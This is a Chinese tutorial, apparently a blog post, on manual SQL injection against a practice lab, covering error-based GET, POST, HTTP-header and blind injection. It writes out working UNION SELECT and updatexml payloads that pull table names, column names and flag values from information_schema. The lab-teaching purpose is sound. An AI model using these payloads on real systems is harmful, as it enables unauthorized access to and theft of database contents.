WEB安全的总结学习与心得（十）—

WEB安全的总结学习与心得（十）

01 SQL注入漏洞之简介
02 SQL注入的过程
03 SQL注入的本质
04 SQL注入靶场
- 1.显错注入(Get注入)
- 显错注入小结
- 2.POST注入
- POST注入小结
- 3.Head注入
- 方法1：利用user agent
- 方法2：利用referer
- 方法3：利用X·Forwarded·For
- 4.sql盲注
- 布尔盲注
- 时间盲注
- 5.宽字节注入
- 后续持续更新敬请期待

01 SQL注入漏洞之简介

属性	介绍
危害	获取数据库信息；获取后台隐私信息；植入Webshell,获取后门
漏洞类型	服务器端漏洞

02 SQL注入的过程

1.获取用户请求参数
2.精心构造代码拼接
3.SQL语句执行构造参数

03 SQL注入的本质

数据和代码未分离，即数据被当做了代码来执行。

04 SQL注入靶场

1.显错注入(Get注入)

第一步：判断注入点
and1=1 正常

and 1=2 报错，因此存在注入点

第二步：判断字段总数
and 1=1 order by 3

and 1=1 order by 4 此时出错说明字段数是3

第三步：判断显示位置
and 1=1 union select 1,2,3，因此显示位置为2和3

第四步：查询当前库名
and 1=1 union select 1,2,database()

第五步：查询表名
and 1=2 union select 1,database(),table_name from information_schema.tables where TABLE_SCHEMA=database() limit 0,1

第六步：查询列名
and 1=2 union select 1,2,column_name from information_schema.columns where TABLE_NAME=“表名” limit 0,1
注：这里注意写表名的是时候要加引号，否则不显示内容
第七步：查询字段内容
and 1=2 union select 1,Id,flag from 表名 limit 0,1

显错注入小结

以上是显错注入中最简单的一次手动注入过程，找注入点时还可能遇到以下几种情况，第一步判断注入存在绕过之后，后续步骤以此类推大同小异。
绕过单引号

绕过单引号括号

绕过双引号括号

2.POST注入

POST注入是指使用POST进行传参的注入
第一步：找注入点
‘or 1=1 – qwe’

第二步：判断字段总数
‘or 1=1 order by 3 – qwe’

第三步：判断显示位置
‘union select 1,2,3 – qwe’

POST注入小结

与Get注入唯一区别就是输入参数的位置由URL变成了前端表单，原理是相同的，后续步骤可参照显错注入照猫画虎。
本文展示的是手动注入的方法，其实POST注入使用渗透工具sqlmap效果不错，具体步骤和方法可以参考本人另一篇文章渗透测试工具sqlmap使用技巧-以POST注入为例

3.Head注入

Head注入就是在传参的时候，将数据构建在http头部，使用head注入需要在登录状态下，因此需要知道用户名和密码，而用户名和密码一般情况下我们是不知道的，可以使用暴力破解，欢迎参考本人另一篇文章渗透测试工具Burpsuite的使用

方法1：利用user agent

得到账号和密码后，通过Burpsuite抓取数据包，将user agent参数改为如下语句

'1 and updatexml(1,concat(0x7e,(select database())),1),1)-- qwe

这里利用报错注入方法，结合更新xml文档的updatexml函数，输入了特殊字符~，于是在不符合xml规则报错的同时执行了嵌入的子查询可以得到我们想要的数据库名，表名等，如下图所示，即找到了注入点，接下来的步骤可以参考GET注入了
第一步：查询库名

第二步：查询表名

 1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1) -- qwe

第三步：查询字段名

1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag_head' limit 0,1)),1),1) -- qwe

第四步：查询字段内容

1' and updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1) -- qwe

方法2：利用referer

与方法1相比只是修改参数的位置不同，这里直接展示最后一步

方法3：利用X·Forwarded·For

这里使用了一个改数据包头部字段的插件，后续会介绍这个插件的使用

4.sql盲注

盲注是指在服务器上没有错误回显的时候进行的注入攻击

布尔盲注

只返回true或者false
第一步：采用二分法获取数据库长度，如下图所示，得到数据库长度是12

第二步，通过抓包暴力破解得到数据库名
如下图所示，substr()是分割函数，第一个参数是待分割字符串，这里是待暴破库名，第二个参数是字符串第几位，ascii()是将字母转换为数字的函数，通过组合暴力破解可以得到库名为kanwolongxia,因为暴力破解耗时太长，一般盲注还是使用渗透工具sqlmap

时间盲注

加入特定的时间函数，通过查看web页面返回的时间差来判断注入的语句是否准确
直接使用sqlmap

5.宽字节注入

后续持续更新敬请期待